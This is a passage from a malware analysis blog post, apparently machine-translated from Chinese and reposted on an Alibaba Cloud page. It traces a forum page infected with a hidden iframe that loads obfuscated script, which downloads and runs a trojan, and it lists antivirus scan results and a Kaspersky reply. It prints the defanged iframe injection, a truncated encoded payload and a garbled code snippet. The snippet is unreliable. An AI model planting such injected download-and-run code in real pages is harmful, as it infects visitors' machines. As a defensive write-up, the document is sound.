Down.exe/virus. win32.autorun. Z/Trojan. PWS. maran.262

Source: Internet
Author: User

Down.exe/virus. win32.autorun. Z/Trojan. PWS. maran.262

EndurerOriginal
2Added replies from Kaspersky.
1Version

When you open a page that is occasionally used in the Forum, rising prompts you to download and run suspicious files.

Search by Google, and Google has already marked it:
Http://www.google.cn/search? Complete = 1 & HL = ZH-CN & newwindow = 1 & Q = % E8 % BF % 98% E7 % 8f % A0 % E5 % 8C % Ba + % E6 % 97% A7 % e9 % 9B % A8 % E6 % a5 % BC % E6 % B8 % 85% E9 % A3 % 8e % E9 % 98% 81 & meta =

Check the webpage code and add it:
/---
<IFRAME src = hxxp: // I **. x *** in ** 8.info/wm.htm width = 1 Height = 1> </iframe>
---/

Hxxp: // I ***. x *** in *** 8.info/wm.htmCode included:
/---
<SCRIPT src = 0614.js> </SCRIPT>
---/

Hxxp: // I **. x ** in ** 8.info/0614.jsContent:
/---
Eval ("/146/165/156/143 /... (Omitted )... /146/75/61/73/175 ")
---/

After two decryption, the original code is obtained. The function is to download down.exe and save it to % WINDIR %. The file name is defined by the UDF:
/---
Function qk45u3 (rm4mf) {var m0qnw = Window ["math"] ["random"] () * rm4mf; return math1_1_round1_1_1_(m0qnw1_1_1_'.exe ';}
---/
That is, ***. EXE, where * is a number, and runs through cmd.exe/C.

File Description: D:/test/down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19602 bytes, 19.146 KB
MD5: a329a121353d80b9871119788f7b14c7

Nspack 1.3-> North Star/Liu Xing Ping

 

File down.exe received at 09:14:12 (CET)
Current status: Completed
Anti-Virus engine Version Last update Scan results
AhnLab-V3 2007.7.28.0 2007.07.27 Win-Trojan/hupigon. gen
AntiVir 7.4.0.50 2007.07.27 TR/agent.19602
Authentium 4.93.8 2007.07.27 Possibly a new variant of W32/threat-hllin-slipper-based! Maximus
Avast 4.7.997.0 2007.07.27 Win32: Small-AMI
AVG 7.5.0.476 2007.07.27 Downloader. generic5.eca
BitDefender 7.2 2007.07.28 Genpack: Generic. malware. wbdld.92022134
Cat-quickheal 9.00 2007.07.26 (Suspicious)-dnascan
ClamAV 0.91 2007.07.28 -
Drweb 4.33 2007.07.27 Trojan. PWS. maran.262
Esafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm
ETrust-vet 31.1.5010 2007.07.28 -
Ewido 4.0 2007.07.27 -
Fileadvisor 1 2007.07.28 -
Fortinet 2.91.0.0 2007.07.28 -
F-Prot 4.3.2.48 2007.07.27 W32/threat-hllin-slipper-based! Maximus
F-Secure 6.70.13030.0 2007.07.27 W32/hupigon. gen67
Ikarus T3.1.1.8 2007.07.27 Backdoor. win32.agent. ahj
Kaspersky 4.0.2.24 2007.07.28 -
McAfee 5085 2007.07.27 -
Microsoft 1.2704 2007.07.28 -
Nod32v2 2426 2007.07.27 A variant of Win32/trojandownloader. Delf. NSA
Norman 5.80.02 2007.07.27 W32/hupigon. gen67
Panda 9.0.0.4 2007.07.28 Generic Trojan
Rising 19.33.42.00 2007.07.27 -
Prevx1 V2 2007.07.28 W32.malware. gen
Sophos 4.19.0 2007.07.26 Mal/packer
Sunbelt 2.2.907.0 2007.07.28 Vipre. Suspicious
Symantec 10 2007.07.28 -
Thehacker 6.1.7.155 2007.07.28 -
Vba32 3.12.2.1 2007.07.27 Malwarw.Trojan-PSW.Game.14
Virusbuster 4.3.26: 9 2007.07.27 -
Webcycler-Gateway 6.0.1 2007.07.28 Trojan. agent.19602

Additional information

File Size: 19602 bytes

MD5: a329a121353d80b9871119788f7b14c7

Sha1: cd849c87c62a23adc01b3d9c1b3c1e5b848faa03

Prevx info: http://fileinfo.prevx.com/fileinfo.asp? Px5 = cbb0e79992c2fa964c9000f9f5065b00efb6d5a7

Sunbelt info: vipre. Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

Subject: Re: [KLAB-2516758]
Sender: "" <Newvirus@kaspersky.com> Sent at: 16:16:38

Hello.

Virus. win32.autorun. Z

New malicious software was found in the attached file.

It's detection will be removed in the next update. Thank you for your help.

-----------------

Regards, Yury nesmachny

Virus analyst, Kaspersky Lab.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.